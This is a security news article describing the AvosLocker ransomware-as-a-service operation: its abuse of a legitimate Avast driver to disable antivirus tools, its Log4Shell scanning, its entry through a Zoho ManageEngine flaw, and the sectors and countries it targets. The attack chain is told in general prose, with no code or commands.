AvosLocker ransomware manages to avoid detection and disable AV tools

The version of the ransomware abuses the driver file to evade AV detection and checks for Log4Shell

Financially motivated gangs adapt new methods to evade AV detection

Researchers discover and report the new version of the AvosLocker ransomware that manages to disable anti-malware solutions and evade detection once the system is infected. These treat actors take advantage of the unpatched security flaws.^[1] The ransomware uses a legitimate anti-virus component to disable the detection and make tools fully blocked from running.^[2]

AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks.

Previous versions of the AvosLocker ransomware^[3] used such techniques for ensuring persistence too. However, this is the first sample employing these new tactics of disabling defense solutions by using the legitimate Avast Anti-rootkit driver file. The ransomware also scans various places on the machine and endpoints for the Log4j vulnerability Log4Shell. This flaw has made headlines in the previous years due to its popularity, high exploit numbers, and severity rate.^[4]

AvosLocker ransomware targeting critical infrastructures in the US typically

This ransomware is one of the newer threats filling up the space left by the other cryptovirus groups that got shut down or stopped operating. It has been observed to release various attacks against critical infrastructure in the United States. Targets include financial services, government facilities, and other organizations that can provide profit for financially motivated criminals.

This ransomware-as-a-service has been working since July 2021, when researchers observed the operations of the ransomware. The new addition to the cryptovirus scene came with new features. These treats recently adapted double and triple extortion methods to make a profit and use the obtained data during these infections. AvosLocker file virus goes to another level by auctioning the data stolen from victims if the targeted organizations refuse to pay the ransom amounts.

Besides the US, the group targets victims in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the UK, Canada, China, and Taiwan.^[5] According to analysis, the main sectors that are targeted remain food and beverage, technology, finance, media, and telecom. These attacks were happening up to February 2022.

Leveraging the exploit for an RCE flaw

The entry point for these attacks is the usage of remote code execution flaws like the one in Zoho ManageEngine ADSelfService plus software. The bug allows running the HTML application hosted on a remote server. The HTA can be executed and trigger the PowerShell script that contains a shellcode capable of connecting to the same hacker-run C&C server and executing further arbitrary commands.

It involved the retrieval of the installer for AnyDesk remote desktop software that is used to deploy other tools to scan the local network. Then the security software can be disabled, and the ransomware payload dropped without any detection risks. Other components are scanning for the Log4Shell remote code execution vulnerability and other flaws, and the mass deployment tool that can help deliver the malicious batch of scripts to multiple endpoints.

These additional malicious processes can disable Windows Update, Defender, and error recovery functions. The machine cannot safely boot and execute security products. The ransomware also creates new admin accounts. Mimikatz and other malicious tools might be involved in these attacks too. However, the analysis shows that the attempt to kill the antivirus products might fail and not be successful every time due to other self-protection features on devices.